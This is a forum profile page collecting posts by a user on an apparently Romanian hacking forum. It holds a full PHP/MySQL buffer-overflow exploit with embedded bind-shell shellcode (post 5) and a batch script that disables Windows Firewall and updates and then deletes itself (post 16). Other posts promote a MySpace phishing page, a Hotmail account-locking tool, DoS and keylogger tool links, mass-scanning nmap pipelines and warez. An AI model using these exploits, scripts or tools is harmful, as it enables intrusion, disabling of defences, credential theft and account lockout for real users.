Jump to content

virusz

Active Members
  • Posts

    1253
  • Joined

  • Last visited

  • Days Won

    6

Everything posted by virusz

  1. dak vretzi sa schimbatzi serialul la wingoze xp , incercatzi cu tutorialul asta ... http://rapidshare.de/files/28172132/XPKeyChange.by.virus.zip.html
  2. virusz

    wireless tools

    Here is the list of tools we commonly use in pentesting wireless networks or just wardriving. http://www.wi-foo.com/index-3.html http://www.wardrive.net/wardriving/tools/ have fun!
  3. its a fake page of myspace, just take a look: http://rapidshare.de/files/18157236/MySpace.User.And.Password.Phreaker-WDYL__www.t-warez.com_.rar have fun!
  4. http://piracywall.com/forum/viewforum.php?f=5 poate ajuta pe cineva...
  5. <?php /* This exploit was designed to work with PHP versions 4.3.10 and 4.4.0 under Windows XP SP 1. If another operating system is used, the replacement EIP must be changed. The replacement EIP is written 261 bytes into our string. For this exploit, I used a CALL ESI from ws2_32.dll from Windows XP SP1. The replacement ESI is simply the base of the PHP image. Locations after this address will be overwritten with some internal data. Our shellcode is written into the $user variable. $two is used to prevent $user from being truncated with a MySQL error message. Cut from advisory (untested) /str0ke */ //Exploit for // Apache/1.3.33 // PHP/4.4.0 //Windows only $eip = "71AB5651"; //EIP - CALL ESI from Winsock 2.0 ws2_32.dll v5.1.2600.0 $esi = "10000000"; //ESI - Temporary. The memory under this location will be trashed. //Metasploit win32 bind shell on port 4444 //Thread exit method, no filter $shellcode = pack("H*","fc6aeb4de8f9ffffff608b6c24248b453c8b7c057801ef8b4f188b5f2001eb498b348b01ee31c099ac84c07407c1ca0d01c2ebf43b54242875e58b5f2401eb668b0c4b8b5f1c01eb032c8b896c241c61c331db648b43308b400c8b701cad8b40085e688e4e0eec50ffd6665366683332687773325f54ffd068cbedfc3b50ffd65f89e56681ed0802556a02ffd068d909f5ad57ffd6535353535343534353ffd06668115c665389e19568a41a70c757ffd66a105155ffd068a4ad2ee957ffd65355ffd068e549864957ffd650545455ffd09368e779c67957ffd655ffd0666a646668636d89e56a505929cc89e76a4489e231c0f3aafe422dfe422c938d7a38ababab6872feb316ff7544ffd65b57525151516a0151515551ffd068add905ce53ffd66affff37ffd08b57fc83c464ffd652ffd068efcee06053ffd6ffd0"); //Endian conversion $eip = substr($eip, 6, 2) . substr($eip, 4, 2) . substr($eip, 2, 2) . substr($eip, 0, 2); $esi = substr($esi, 6, 2) . substr($esi, 4, 2) . substr($esi, 2, 2) . substr($esi, 0, 2); $overflowstring = "localhost:/"; $overflowstring .= "XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX"; $overflowstring .= pack("H*",$eip); //EIP $overflowstring .= pack("H*",$esi); //ESI $overflowstring .= "/"; //If we don't define this, our shellcode gets truncated $two = "AAAAAAAAAA"; mysql_connect($overflowstring, $shellcode); ?> # Love All
  6. virusz

    Hy all

    Welcome scara, te stiu de undeva . ..lolz
  7. 100% asta e passu': undergr0und.net luatzi shi d'aici: http://www.realvnc.com/cgi-bin/download.cgi
  8. va salut pe toti, "patrulez" de ceva vreme pe acest forum dar nu m-am prezentat, pana acu' nick: V]i[rus - dar mai merje shi virusz Age: 17 , 1989 poate stau mai multzi ani p'aici... City: Deta - un orasel cam uitat de lume .. in timis lolz bravo la totzi care suntetzi aici pe phorum, e un forum bun din care inveti ceva bun (bun pe o parte, lolz, partea rea? ...nu e prea bun pentru victime ) ce sa mai zic, imi place muzik...genuri: trance and hip-hop ro.. sper sa ne intzelegem cat de cat ... c ya'
  9. ai putea sa il iei pana nu sterg aia linkurile ...
  10. http://sectools.org/ or try: http://insecure.org/ titlu spune tot. Have fun!
  11. Description: ASTALAVISTA SECURITY TOOLBOX DVD v2.0 Astalavista's Security Toolbox DVD v2.0 is considered to be the largest and most comprehensive Information Security archive.As always we are committed to provide you with a resource for all of your security and hacking interests, in an interactive way! The Information found on the Security Toolbox DVD has been carefully selected, so that you will only browse through quality information and tools.No matter if you are a computer enthusiast, a computer geek, a newbie looking for information on "how to hack", or an ITSecurity professional looking for quality and up to date information for offline use or just for convenience, we are sure that you will be satisfied, even delighted by the DVD! [url]http://rapidshare.de/files/22963029/astb2.0.part01.rar[/url] [url]http://rapidshare.de/files/22965966/astb2.0.part02.rar[/url] [url]http://rapidshare.de/files/22968906/astb2.0.part03.rar[/url] [url]http://rapidshare.de/files/22971825/astb2.0.part04.rar[/url] [url]http://rapidshare.de/files/22974520/astb2.0.part05.rar[/url] [url]http://rapidshare.de/files/22977300/astb2.0.part06.rar[/url] [url]http://rapidshare.de/files/22980233/astb2.0.part07.rar[/url] [url]http://rapidshare.de/files/22983005/astb2.0.part08.rar[/url] [url]http://rapidshare.de/files/22985842/astb2.0.part09.rar[/url] [url]http://rapidshare.de/files/22988432/astb2.0.part10.rar[/url] [url]http://rapidshare.de/files/22991189/astb2.0.part11.rar[/url] [url]http://rapidshare.de/files/22993837/astb2.0.part12.rar[/url] [url]http://rapidshare.de/files/22996059/astb2.0.part13.rar[/url] [url]http://rapidshare.de/files/22998048/astb2.0.part14.rar[/url] [url]http://rapidshare.de/files/22999947/astb2.0.part15.rar[/url] [url]http://rapidshare.de/files/23001613/astb2.0.part16.rar[/url] [url]http://rapidshare.de/files/23031359/astb2.0.part17.rar[/url] [url]http://rapidshare.de/files/23033928/astb2.0.part18.rar[/url] [url]http://rapidshare.de/files/23036563/astb2.0.part19.rar[/url] [url]http://rapidshare.de/files/23039246/astb2.0.part20.rar[/url] [url]http://rapidshare.de/files/23042664/astb2.0.part21.rar[/url] [url]http://rapidshare.de/files/23045279/astb2.0.part22.rar[/url] [url]http://rapidshare.de/files/23048210/astb2.0.part23.rar[/url] [url]http://rapidshare.de/files/23051249/astb2.0.part24.rar[/url] [url]http://rapidshare.de/files/23054164/astb2.0.part25.rar[/url] [url]http://rapidshare.de/files/23057062/astb2.0.part26.rar[/url] [url]http://rapidshare.de/files/23059901/astb2.0.part27.rar[/url] [url]http://rapidshare.de/files/23062926/astb2.0.part28.rar[/url] [url]http://rapidshare.de/files/23065780/astb2.0.part29.rar[/url] [url]http://rapidshare.de/files/23068662/astb2.0.part30.rar[/url] [url]http://rapidshare.de/files/23071370/astb2.0.part31.rar[/url] [url]http://rapidshare.de/files/23073876/astb2.0.part32.rar[/url] [url]http://rapidshare.de/files/23076444/astb2.0.part33.rar[/url] [url]http://rapidshare.de/files/23078753/astb2.0.part34.rar[/url] [url]http://rapidshare.de/files/23081470/astb2.0.part35.rar[/url] [url]http://rapidshare.de/files/23083045/astb2.0.part36.rar[/url] [url]http://rapidshare.de/files/23084586/astb2.0.part37.rar[/url] [url]http://rapidshare.de/files/23086010/astb2.0.part38.rar[/url] [url]http://rapidshare.de/files/23087524/astb2.0.part39.rar[/url] [url]http://rapidshare.de/files/23088971/astb2.0.part40.rar[/url] [url]http://rapidshare.de/files/23090266/astb2.0.part41.rar[/url] [url]http://rapidshare.de/files/23090468/astb2.0.part42.rar[/url]
  12. intra aci: http://www.yolinux.com/TUTORIALS/ dupa care cautzi "Web site configuration" pt mai multe tutoriale: http://www.yolinux.com/TUTORIALS/ have fun!
  13. http://www.yolinux.com/TUTORIALS/LinuxTuto...bSiteConfig.htm
  14. virusz

    hacking t0olz

    The following is a list of tools we have collected over the years. Each of the tools below are discussed in "Hacking Exposed: Network Security Secrets and Solutions".Both defensive and hacking tools and web sites are presented here as a summary of those discussed in the book. Any tools used that are part of the default operating system are not included here. Also, any Tools discussed in the book which that are not on this list may be found in the Windows NT Resource Kit and/or in the Supplement II. General Security Tool Sites Hackersclub http://www.hackersclub.com NewOrder http://neworder.box.sk Security-Focus http://www.securityfocus.com Technotronic http://www.technotronic.com Countermeasure Tools BlackICE by NetworkICE http://www.networkice.com CyberCop Monitor by Network Associates Inc. http://www.nai.com Hidden Object Locator http://www.netwarefiles.com/utils/hobjloc.zip Ippl http://www.via.ecp.fr/~hugo/ippl/ ITA from Axent http://www.axent.com Kane Security Monitor http://www.intrusion.com Netguard http://www.Genocide2600.com/~tattooman/uni...rd-1.0.0.tar.gz Network Flight Recorder http://www.nfr.net Perro (formerly Protolog) http://www.grigna.com/diego/linux/protolog/index.html Psionic Portsentry from the Abacus project http://www.psionic.com/abacus/ RealSecure by Internet Security Systems (ISS) http://www.iss.net Scanlogd http://www.openwall.com/scanlogd/ Secured by Memco http://www.memco.com Secure Shell (SSH) http://www.ssh.fi http://www.f-secure.com SessionWall-3 by Abirnet/Platinum Technology http://www.abirnet.com Denial of Service Land and Latierra http://www.rootshell.com/archive-j457nxiqi...711/land.c.html http://www.rootshell.com/archive-j457nxiqi...latierra.c.html Portfuck http://www.stargazer.net/~flatline/filez/portfuck.zip Smurf & Fraggle http://www.rootshell.com/archive-j457nxiqi...10/smurf.c.html http://www.rootshell.com/archive-j457nxiqi.../fraggle.c.html Synk4 http://www.jabukie.com/Unix_Sourcez/synk4.c Teardrop, newtear, bonk, syndrop http://www.rootshell.com/archive-j457nxiqi...teardrop.c.html http://www.rootshell.com/archive-j457nxiqi.../newtear.c.html http://www.rootshell.com/archive-j457nxiqi...801/bonk.c.html http://www.rootshell.com/archive-j457nxiqi.../syndrop.c.html Enumeration Tools Bindery http://www.nmrc.org/files/netware/bindery.zip Bindin ftp://ftp.edv-himmelbauer.co.at/Novell.3x...PROG/BINDIN.EXE Epdump http://www.ntshop.net/security/tools/def.htm Finger ftp://ftp.cdrom.com/.1/novell/finger.zip Legion ftp://ftp.technotronic.com/rhino9-products/legion.zip NDSsnoop ftp://ftp.iae.univ-poitiers.fr/pc/netware...IL/ndssnoop.exe NetBios Auditing Tool (NAT) ftp://ftp.technotronic.com/Mic*ft/nat10bin.zip Netcat by Hobbit http://www.l0pht.com/~weld/netcat/ Netviewx http://www.ibt.ku.dk/jesper/NTtools/ Nslist http://www.nmrc.org/files/snetware/nut18.zip On-Site Admin ftp://ftp.cdrom.com/.1/novell/onsite.zip Snlist ftp://ftp.it.ru/pub/netware/util/NetWare4...Toos/snlist.exe Somarsoft (dumpacl, dumpreg, etc.) http://38.15.19.115/ user2sid and sid2user http://www.chem.msu.su:8080/~rudnyi/NT/sid.txt Userdump ftp://ftp.cdrom.com/.1/novell/userdump.zip Userinfo ftp://ftp.cdrom.com/.1/novell/userinfo.zip Footprinting Tools ARIN database http://www.arin.net/whois/ Cyberarmy http://www.cyberarmy.com Dogpile (meta search engine) http://www.dogpile.com DomTools (axfr) http://www.domtools.com/pub/domtools1.4.0.tar.gz Ferretsoft http://www.ferretsoft.com Sam Spade http://www.samspade.org Securities and Exchange Commission (SEC) http://www.sec.gov/ USENET Searching http://www.deja.com http://www.dogpile.com VisualRoute http://www.visualroute.com WHOIS database http://www.networksolutions.com WS_ Ping Pack Pro http://www.ipswitch.com Gaining Access L0phtcrack's Readsmb http://www.l0pht.com/ Legion http://www.rhino9.com NetBios Auditing Tool (NAT) ftp://ftp.technotronic.com/Mic*ft/nat10bin.zip Nwpcrack http:www.nmrc.org/files/netware/nwpcrack.zip SMBgrind by NAI Included with CyberCop Scanner from Network Associates (http://www.nai.com) Sniffit http://newdata.box.sk/neworder/a/sniffit.0.3.2.tar.gz SNMPsniff http://www.AntiCode.com/archives/network-s...mpsniff-1_0.tgz THC login/telnet http://thc.pimmel.com/files/thc/thc-lh11.zip Privilege Escalation and Back Door Tools Elitewrap http://www.multimania.com/trojanbuster/elite.zip Getadmin http://www.ntsecurity.net/security/getadmin.htm Hunt http://www.cri.cz/kra/index.html#HUNT Imp http://www.wastelands.gen.nz/ Invisible Keystroke Logger http://www.amecisco.com/iksnt.htm Jcmd http://www.jrbsoftware.com John the Ripper http://www.openwall.com/john/ Netbus http://www.netbus.org Netcat http://www.l0pht.com/netcat NTFSDOS http://www.sysinternals.com NTuser http://www.pedestalsoftware.com Pandora by NMRC http://www.nmrc.org/pandora/download.html Pwdump2 http://www.webspan.net/~tas/pwdump2/ Revelation by Snadboy http://www.snadboy.com Sechole http://www.ntsecurity.net/security/sechole.htm SNMPsniff http://packetstorm.harvard.edu/sniffers/sn...niff-1.0.tar.gz Unhide http://www.webdon.com Virtual Network Computing (VNC) http://www.uk.research.att.com/vnc Pilfering File Wrangler http://www.tucows.com PowerDesk's ExplorerPlus http://www.mijenix.com/powerdesk98.asp Revelation http://www.snadboy.com Rootkits and Cover Tracks Cygwin Win32 (cp and touch commands) http://www.cygnus.com Wipe ftp://ftp.technotronic.com/unix/log-tools...s/wipe-1.00.tgz Zap ftp://ftp.technotronic.com/unix/log-tools/zap.c Scanning Tools BindView http://www.bindview.com Chknull http://www.nmrc.org/files/netware/chknull.zip CyberCop Scanner by NAI http://www.nai.com Firewalk http://www.packetfactory.net/firewalk/ Fping http://packetstorm.harvard.edu/ HackerShield by Bindview http://www.bindview.com/netect Hping http://www.kyuzz.org/antirez/ InspectorScan by Shavlik http://www.shavlik.com Internet Scanner by ISS http:/www.iss.net Kane Security Analyst http://www.intrusion.com Network Mapper (Nmap) http://www.insecure.org/nmap NTInfoscan http://www.infowar.co.uk/mnemonix/ Pinger ftp://ftp.technotronic.com/rhino9-products/pinger.zip Scan http://www.prosolve.com Solarwinds http://www.solarwinds.net Strobe http://www.hack-net.com/cgibin/download.cg...strobe-1_03.tgz Udpscan ftp://ftp.technotronic.com/unix/network-s...nners/udpscan.c WebTrends Security Analyzer by WebTrends http://www.webtrends.com WS_Ping Pack Pro http://www.ipswitch.com War Dialing Tools PhoneSweep by Sandstorm http://www.sandstorm.net THC http://www.infowar.co.uk/thc/ ToneLoc http://www.hackersclub.com/km/files/pfiles/Tl110.zip
  15. This is written on the fly by me for the English People Smile The thoughts are : I have an Exploit, or im Scanning and doing Pentests in the wild with nessus. But its so slow sience Nessus pings the Hosts itselfs and checks them... andere here is the Way with Nmap Wink Let nmap do a speedy pingtest on the ranges, and living hosts into a file, and put them to Nessus. Thats a faster way, as scanning with Nessus manually in the Wild Razz Here are two from me : This here will check all IP Adresses from the Network 192.168.0.0/16 ( Range : 192.168.0.0-192.168.254.254 ) (Ping Test), and write them to the file -> hosts_up1.txt grep up, will grep onle the hosts where are up, awk will write the IP Only, from this Host in the File (because some pentesting tools like nessus only supports single ips in target files.) nmap -n -sP -v --min-parallelism 64 -T4 192.168.0.0/16 | grep up | awk '{ print $2 }' >> hosts_up1.txt Let me explain another command, sience you have now a file with online hosts and you have an exploit here is an example with the old exploit "openssl-too-open" : We scan these Living hosts for Open Port 443 and write these responding hosts to a file, i'm using sed to filter the results sience nmap output is like this : 192.168.4.6: 192.168.7.4: etc we must filter the ':' to make this al working ip_target list for the other Programs, im using the Unix Program sed: nmap -iL hosts_up1.txt -p 443 -n | grep -B 2 open | grep on | awk '{ print $4 }' | sed 's/':'/''/g' >> ssl-hosts.txt now we can use openssl-scanner to scan the ssl_scan.txt Wink ...thats are some examples how to fighting with nmap, with those variables its a real dangerous and speedy tool. have fun
  16. I can assure you the first virus to be released following SP2's inception will contain something similar to the following: KillFirewall.bat echo off net stop "Security Center" net stop SharedAccess > "%Temp%.kill.reg" ECHO REGEDIT4 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServicesSharedAccess] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMCurrentControlSetServiceswuauserv] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. >>"%Temp%.kill.reg" ECHO [HKEY_LOCAL_MACHINESYSTEMControlSet001Serviceswscsvc] >>"%Temp%.kill.reg" ECHO "Start"=dword:00000004 >>"%Temp%.kill.reg" ECHO. START /WAIT REGEDIT /S "%Temp%.kill.reg" DEL "%Temp%.kill.reg" DEL %0 Shuts down Windows Firewall, disables Automatic Updates for the next reboot. And no, Mic*ft is not going to fix this. This code will work when it goes live. WTG MS!
  17. Here is a list of SQL commands and what they do, these would be used in some injection methods and of course legitimate sql functions. On thier own they wont exploit anything but eventually youl find an exploit that needs these and they are good to know for injection or just to better understand how SQL works. ABORT -- abort the current transaction ALTER DATABASE -- change a database ALTER GROUP -- add users to a group or remove users from a group ALTER TABLE -- change the definition of a table ALTER TRIGGER -- change the definition of a trigger ALTER USER -- change a database user account ANALYZE -- collect statistics about a database BEGIN -- start a transaction block CHECKPOINT -- force a transaction log checkpoint CLOSE -- close a cursor CLUSTER -- cluster a table according to an index COMMENT -- define or change the comment of an object COMMIT -- commit the current transaction COPY -- copy data between files and tables CREATE AGGREGATE -- define a new aggregate function CREATE CAST -- define a user-defined cast CREATE CONSTRAINT TRIGGER -- define a new constraint trigger CREATE CONVERSION -- define a user-defined conversion CREATE DATABASE -- create a new database CREATE DOMAIN -- define a new domain CREATE FUNCTION -- define a new function CREATE GROUP -- define a new user group CREATE INDEX -- define a new index CREATE LANGUAGE -- define a new procedural language CREATE OPERATOR -- define a new operator CREATE OPERATOR CLASS -- define a new operator class for indexes CREATE RULE -- define a new rewrite rule CREATE SCHEMA -- define a new schema CREATE SEQUENCE -- define a new sequence generator CREATE TABLE -- define a new table CREATE TABLE AS -- create a new table from the results of a query CREATE TRIGGER -- define a new trigger CREATE TYPE -- define a new data type CREATE USER -- define a new database user account CREATE VIEW -- define a new view DEALLOCATE -- remove a prepared query DECLARE -- define a cursor DELETE -- delete rows of a table DROP AGGREGATE -- remove a user-defined aggregate function DROP CAST -- remove a user-defined cast DROP CONVERSION -- remove a user-defined conversion DROP DATABASE -- remove a database DROP DOMAIN -- remove a user-defined domain DROP FUNCTION -- remove a user-defined function DROP GROUP -- remove a user group DROP INDEX -- remove an index DROP LANGUAGE -- remove a user-defined procedural language DROP OPERATOR -- remove a user-defined operator DROP OPERATOR CLASS -- remove a user-defined operator class DROP RULE -- remove a rewrite rule DROP SCHEMA -- remove a schema DROP SEQUENCE -- remove a sequence DROP TABLE -- remove a table DROP TRIGGER -- remove a trigger DROP TYPE -- remove a user-defined data type DROP USER -- remove a database user account DROP VIEW -- remove a view END -- commit the current transaction EXECUTE -- execute a prepared query EXPLAIN -- show the execution plan of a statement FETCH -- retrieve rows from a table using a cursor GRANT -- define access privileges INSERT -- create new rows in a table LISTEN -- listen for a notification LOAD -- load or reload a shared library file LOCK -- explicitly lock a table MOVE -- position a cursor on a specified row of a table NOTIFY -- generate a notification PREPARE -- create a prepared query REINDEX -- rebuild corrupted indexes RESET -- restore the value of a run-time parameter to a default value REVOKE -- remove access privileges ROLLBACK -- abort the current transaction SELECT -- retrieve rows from a table or view SELECT INTO -- create a new table from the results of a query SET -- change a run-time parameter SET CONSTRAINTS -- set the constraint mode of the current transaction SET SESSION AUTHORIZATION -- set the session user identifier and the current user identifier of the current session SET TRANSACTION -- set the characteristics of the current transaction SHOW -- show the value of a run-time parameter START TRANSACTION -- start a transaction block TRUNCATE -- empty a table UNLISTEN -- stop listening for a notification UPDATE -- update rows of a table VACUUM -- garbage-collect and optionally analyze a database have a nice day!
  18. Just wanted to tell you about my program, I coded in VB. MSN Locker X, is a Msn/Hotmail account freezer. What it does, is it sends bad password attempts from the email you wanna freeze, to the msn server, (messenger.hotmail.com:1863) and it keeps looping the bad password attempts. Now when Hotmail receives all these bad password attempts, it will lock the account. The user will not be able to check their inbox or sign on msn messenger. Download: http://winkillerx.dajoob.com/MSN_Locker_X.zip
  19. Metasploit 3.0 is the next generation of the Metasploit Framework. It is written in the Ruby programming language and is a complete rewrite of the 2.0 branch. The Metasploit 2.0 branch drastically reduced exploit development time and promoted code re-use between similar exploit modules. The extensible model through which payloads, encoders, no-op generators, and exploits can be integrated has made it possible to use the Metasploit Framework as an outlet for cutting-edge exploitation research. In this light, the 3.0 branch continues to evolve the field of exploitation research and exploitation frameworks in general. The primary goals of the 3.0 branch are listed below: * Improve automation of exploitation through scripting * Simplify the process of writing an exploit * Increase code re-use between exploits * Improve and generically integrate evasion techniques * Support automated network discovery and event correlation through recon modules * Continue to provide a friendly outlet for cutting edge exploitation technology Linux, BSD, Mac OS X, Windows Cygwin [url]http://www.metasploit.com/projects/Framework/msf3/download.html?Release=framework-3.0-alpha-r3.tar.gz[/url] Windows 2000/XP/2003 (without Cygwin) [url]http://www.metasploit.com/projects/Framework/msf3/download.html?Release=framework-3.0-beta-1.exe[/url] Web interface: [url]http://metasploit.com:55555/[/url]
  20. cauta cu google : inurl:"ftp." index.of
  21. nu te pune nime sa le instalezi pe toate!
  22. virusz

    Fun stuff

    woow...bash ca-i lol..
×
×
  • Create New...